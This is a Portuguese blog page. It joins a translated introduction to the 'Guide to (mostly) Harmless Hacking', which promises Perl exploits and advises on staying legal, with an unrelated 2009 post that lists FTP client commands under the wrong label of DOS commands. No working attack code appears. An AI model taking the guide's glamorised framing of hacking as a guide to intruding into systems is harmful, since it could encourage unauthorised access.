E nos Volumes: I, II e III do GDMHI, você poderá já a entrar seriamente em
hackear em Unix.

Você até poderá fazer parte das fileiras dos chamados: Uberhackers, sem
precisar gastar muita grana em caro equipamento de computação. No Volume II
nós te introduzimos ao Linux, o sistema de operação gratuito e de prefêrencia
dos hackers, Linux roda até em um micro 386 com somente 2MB de RAM! Linux é tão bom,
que muitos provedores já o tem rodando e controlando seus sites.

No Volume III nós também introduziremos Perl, a linguagem de programção para shells
adorada pelos Uberhackers. Nós até te ensinaremos algumas funções letais ou "exploits",
que rodam em Perl usando Linux. OK, você pode usar esses "exploits" para ações ilegais.
Mas eles só se tornam ilegais se usados contra o computador de alguém sem a permissão
do dono ou responsável.
Você pode rodar qualquer programa nesse livro no seu próprio computador, ou no do seu
(com consentimento)amigo. Seriamente falando, nada nesse livro irá na verdade danificar
o seu computador, a não ser que usado com o intento do dano de propósito.

Também abriremos os portões para um maravilhoso sub-mundo, onde poderás ficar informado
de todas as descobertas de falhas em segurança de sistemas. Onde poderás delas tirar
proveito, ou defender seu sistema contra as mesmas.

Sobre o Guia de (na maioria) Hacking Inofensivo

Nós temos notado que existem muitos livros que glorificam hackers.
Ao ler esses livros talvez você pense que se levaria muitos anos de um brilhante
trabalho para se tornar um deles. Claro que nós hackers amamos perpetuar esse mito,
porque ele nos faz parecer incrívelmente invejado.

Mas, quantos livros podes encontrar, que digam ao iniciante passo a passo,
como realmente fazer essa coisa chamada hacking? Nenhum ! Sério, você já leu um livro tipo:
"Segredos de um Super-Hacker" ou "Segredos Proibidos da Sociedade Hacker Fim-do-Mundo" ?
Mesmo asim se caso tenhas já encontrado coisa similar, praticamente estará cheio de
informações vagas e já velhas. Dá um tempo.

Como também se fores até um desses hackers news groups no Internet e perguntares para as
pessoas lá, como fazer todos esses truques, muitos deles até te insultarão ou te chacotearão.
OK, hackers estão sempre fazendo troça contigo.

Nós vemos muitos hackers se vangloriando, mantendo-se obscuros, se recusando a ajudar
outros à aprender como hackear. Por Que? Porque eles não querem que você na verdade descubra
que na verdade, a maioria das coisas que eles fazem é muito simples!

Bem; Até pensamos nisso também. Nós pensamos no prazer em insultar as pessaos que nos
perguntam em como hackear. Ou melhor podíamos satisfazer nossos egos ao realmente ensinar
essas mesmas pessoas, talvez milhares, a hackear. Prefiro ensinar, bom pro meu ego. he,he,he

Como usar os Guia de (na maioria) Hacking Inofensivo

Se sabes como usar um micro e estás conectado ao Internet, você já sabe o suficiente para
começar a aprender a ser um hacker, nem precisas ler todos os GDMHI para se tornar um hacker.

Podes contar que tudo nos Volumes I, II, e III é tão fácil, que podes começar a ler em
qualquer seção que te interesse e seguir as instruções.

Mas se seu plano é se tornar "elite", seria muito melhor se lesses todos os Guias,
visite os muitos WEB sites e newsgroups aos quais indicarmos, podes até achar um "tutor"
entre os tantos talentosos hackers que enviam material para o nosso Hackers forum ou converse
no nosso servidor com IRC no seguinte endereço: http://www.infowar.com como também na
Happy Hacker lista de e-mail ((email hacker@techbroker.com) com a mensagem "subscribe").

Se o seu goal é se tornar um Uberhacker, os Guias terminarão sendo só os primeiros em uma
montanha de material que você precisará estudar. Embora te oferecemos uma estratégia de estudo,
que muito te ajudará em sua missão de alcançar o pedestal de hacking.

Como Não Ser Pego

Um pequeno problemaem hackear é que se você pisar além da linha, você pode ir prá cadeia.
Nós faremos o melhor possível em descrever tipos de hackeação que podem te causar problemas
com a lei. Mas saibas que não somos advogados ou especialistas em leis de computação.
Ainda por cima, todo o estado e todo país possuem suas próprias leis em vigor, e essas leis
estão sempre mudando. Devido a essas coisas, deves agir com um pouco de senso.

Embora tenhamos um Guia de (na maioria) Hacking Inofensivo sobre leis de computação, que pode
te evitar cometer certas "pisadas na bola".

Mas, sem dúvida, a melhor proteção contra ser pego, é a "regra de ouro", se você está prestes
a fazer algo que não gostarias de ser feito com você, esqueça! Faça hackeação que torne esse
mundo melhor, ou que no minímo seja divertida e inofensiva, e te garanto sempre se manterás
fora de qualquer problema.

Logo, se você tiver uma idéia tirada do Guia De (na maioria) Hacking Inofensivo, que te
ajudaria a fazer algo malicioso ou destrutivo, o problema é só seu se serás o próximo
HACKER atrás das grades. Ei, a lei não liga se a pessoa a que o computador você hackeou
era um babaca. Não liga se o banco de dados da poderosa firma ao qual você bagunçou tinha
despedido seu melhor amigo. Eles só se interesarão em saber que você quebrou a lei.

Para algumas pessaos parece ser emocionante, em iniciar uma histeria nacional, ao se
fazer parte de um novo ataque dos Diabólicos Hackers no país. Mas depois do julgamento,
quando esse leitor dos Guias, se tornar a "namorada" na cela do sujeito chamado "espeto",
será que todo esse show valeu a pena para ele?

------------------------------------------------------------------------
NOTA DE TRADUÇÃO:

_Nessa parte do documento original do Guia, se encontra a seção sobre gírias e linguagem hacker,
devido ao fato de as mesmas não fazerem nenhum sentido gramática ou contextualmente quando
trazidas ao Português, Não foram incluídas nesse Guia. Os interessados podem ter acesso a
elas no Guia em Inglês, nesse mesmo site. Obrigado!_

------------------------------------------------------------------------

Quem É Você?

Presumimos algumas razões por que você estaria lendo estes Guias:

. Você possui seu próprio micro IBM ou Macintosh
. Você possui uma conta de Internet com algum provedor
. Você é dono de um senso de humor e de aventura, e deseja expresá-
los através de hacking
. Ou, você quer impressionar seu círculo de amigos e descolar umas
gatas, (ou gatos), ao fazê-los pensar que és um Diabólico Hacker

E aí, esse cenário descreve você? Se positivo, OK, Liga aí seus computadores,
estão todos preparados para começar a hackear?.

quinta-feira, 10 de setembro de 2009

comandos do dos

COMANDOS

FUNÇÕES

APPEND

ACRESCENTAR UM ARQUIVO

ASCII

DEFINIR UM TIPO DE TRANFERÊNCIA ASCII

BELL

EMITIR UM AVISO SONORO AO TÉRMINO DO COMANDO

BINARY

DEFINIR TIPO DE TRANSFERÊNCIA BINÁRIA

BYE

TERMINAR SEÇÃO DE FTP E SAIR

CD

ALTERAR A PASTA DE TRABALHO REMOTA

CLOSE

TERMINAR SESSÃO DE FTP

DELETE

EXCLUIR PASTAS DE TRABALHO REMOTA

DEBUG

LIGAR/DESLIGAR MODO DE DEPURAÇÃO

DIR

LISTAR CONTEÚDO DA PASTA REMOTA

DISCONNECT

TERMINAR SESSÃO DE FTP

GET

RECEBER ARQUIVO

GLOB

LIGAR/DESLIGAR O MASCARAMENTO EM NOME DE ARQUIVOS LOCAIS

HASH

LIGAR/DESLIGAR IMPRESSÃO "#" PARA CADA BUFFER TRANSFERIDO

HELP

AJUDA DO FTP

LCD

ALTERAR A PASTA DE TRABALHO LOCAL

LITERAL

ENVIAR UM COMANDO DE FTP ARBITÁRIO

LS

LISTAR O CONTEÚDO DA PASTA REMOTA

MDELETE

EXCLUI VÁRIOS ARQUIVOS

MDIR

LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS

M GET

OBTER VÁRIOS ARQUIVOS

MKDIR

CRIA UMA PASTA NA MÁQUINA NA MÁQUINA REMOTA

MLS

LISTAR O CONTEÚDO DE VÁRIAS PASTAS REMOTAS

MPUT

ENVIAR VÁRIOS ARQUIVOS

OPEN

CONECTAR AO FTP REMOTO

PROMPT

FORÇAR PROMPT INTERATIVO EM MÚLTIPLOS COMANDOS

PUT

ENVIAR UM ARQUIVO

PWD

IMPRIMIR A PASTA DE TRABALHO NA MÁQUINA REMOTA

QUIT

TERMINAR A SESSÃO DE FTP E SAIR

QUOT

ENVIAR UM COMANDO ARBITRÁRIO

RECV

RECEBER ARQUIVO

REMOTEHELP

OBTER AJUDA A PARTIR DO SERVIDOR REMOTO

RENAME

RENOMEAR ARQUIVO

RMDIR

REMOVER PASTA DA MÁQUINA REMOTA

SEND

ENVIAR ARQUIVO

STATUS

MOSTRAR STATUS ATUAL

TRACE

LIGAR/DESLIGAR RASTREAMENTO DE PACOTES

TYPE

DEFINIR O TIPO DE TRANSFERÊNCIA DE ARQUIVOS

USER

ENVIAR INFORMAÇÕES DE NOVO USUÁRIO